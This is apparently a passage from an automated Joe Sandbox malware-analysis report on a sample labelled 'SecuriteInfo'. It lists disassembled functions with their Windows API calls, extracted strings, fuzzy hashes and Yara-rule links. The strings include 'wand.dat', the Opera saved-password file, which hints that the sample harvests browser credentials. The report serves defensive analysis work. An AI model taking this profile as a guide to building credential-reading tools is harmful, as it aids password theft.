                                                              • String ID: \StringFileInfo\
                                                              • API String ID: 102104167-2245444037
                                                              • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                              • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                              • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                              • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                              Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004100FB
                                                              • memset.MSVCRT ref: 00410112
                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                              • _snwprintf.MSVCRT ref: 00410141
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf_wcslwrwcscpy
                                                              • String ID: </%s>
                                                              • API String ID: 3400436232-259020660
                                                              • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                              • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                              • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                              • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                              Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040D58D
                                                              • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                              • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ChildEnumTextWindowWindowsmemset
                                                              • String ID: caption
                                                              • API String ID: 1523050162-4135340389
                                                              • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                              • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                              • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                              • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                              Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                              • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                              • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                              • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                              • String ID: MS Sans Serif
                                                              • API String ID: 210187428-168460110
                                                              • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                              • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                              • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                              • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                              Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040560C
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                              • String ID: *.*$dat$wand.dat
                                                              • API String ID: 2618321458-1828844352
                                                              • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                              • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                              • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                              • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                              Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00412057
                                                                • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                              • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                              • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                              • GetKeyState.USER32(00000010), ref: 0041210D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                              • String ID:
                                                              • API String ID: 3550944819-0
                                                              • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                              • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                              • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                              • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                              Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • free.MSVCRT ref: 0040F561
                                                              • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                              • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpy$free
                                                              • String ID: g4@
                                                              • API String ID: 2888793982-2133833424
                                                              • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                              • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                              • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                              • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                              Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004144E7
                                                                • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                              • memset.MSVCRT ref: 0041451A
                                                              • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                              • String ID:
                                                              • API String ID: 1127616056-0
                                                              • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                              • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                              • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                              • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                              Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                              • malloc.MSVCRT ref: 00417459
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                              • free.MSVCRT ref: 0041747F
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$freemalloc
                                                              • String ID:
                                                              • API String ID: 2605342592-0
                                                              • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                              • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                              • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                              • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                              Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                              • RegisterClassW.USER32(?), ref: 00412428
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                              • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HandleModule$ClassCreateRegisterWindow
                                                              • String ID:
                                                              • API String ID: 2678498856-0
                                                              • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                              • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                              • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                              • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                              Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F673
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                              • strlen.MSVCRT ref: 0040F6A2
                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                              • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                              • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                              • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                              Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F6E2
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                              • strlen.MSVCRT ref: 0040F70D
                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                              • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                              • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                              • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                              Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                              • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                              • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                              • GetStockObject.GDI32(00000000), ref: 004143C6
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                              • String ID:
                                                              • API String ID: 764393265-0
                                                              • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                              • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                              • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                              • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                              Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Time$System$File$LocalSpecific
                                                              • String ID:
                                                              • API String ID: 979780441-0
                                                              • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                              • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                              • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                              • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                              Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                              • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                              • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpy$DialogHandleModuleParam
                                                              • String ID:
                                                              • API String ID: 1386444988-0
                                                              • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                              • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                              • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                              • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                              Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • wcschr.MSVCRT ref: 0040F79E
                                                              • wcschr.MSVCRT ref: 0040F7AC
                                                                • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: wcschr$memcpywcslen
                                                              • String ID: "
                                                              • API String ID: 1983396471-123907689
                                                              • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                              • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                              • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                              • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                              Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _snwprintf.MSVCRT ref: 0040A398
                                                              • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfmemcpy
                                                              • String ID: %2.2X
                                                              • API String ID: 2789212964-323797159
                                                              • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                              • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                              • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                              • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                              Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040E770
                                                              • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessageSendmemset
                                                              • String ID: F^@
                                                              • API String ID: 568519121-3652327722
                                                              • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                              • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                              • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                              • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                              Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • wcslen.MSVCRT ref: 0040B1DE
                                                              • free.MSVCRT ref: 0040B201
                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                              • free.MSVCRT ref: 0040B224
                                                              • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: free$memcpy$mallocwcslen
                                                              • String ID:
                                                              • API String ID: 726966127-0
                                                              • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                              • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                              • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                              • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                              Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • strlen.MSVCRT ref: 0040B0D8
                                                              • free.MSVCRT ref: 0040B0FB
                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                              • free.MSVCRT ref: 0040B12C
                                                              • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: free$memcpy$mallocstrlen
                                                              • String ID:
                                                              • API String ID: 3669619086-0
                                                              • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                              • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                              • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                              • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                              Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                              • malloc.MSVCRT ref: 00417407
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                              • free.MSVCRT ref: 00417425
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$freemalloc
                                                              • String ID:
                                                              • API String ID: 2605342592-0
                                                              • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                              • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                              • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                              • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5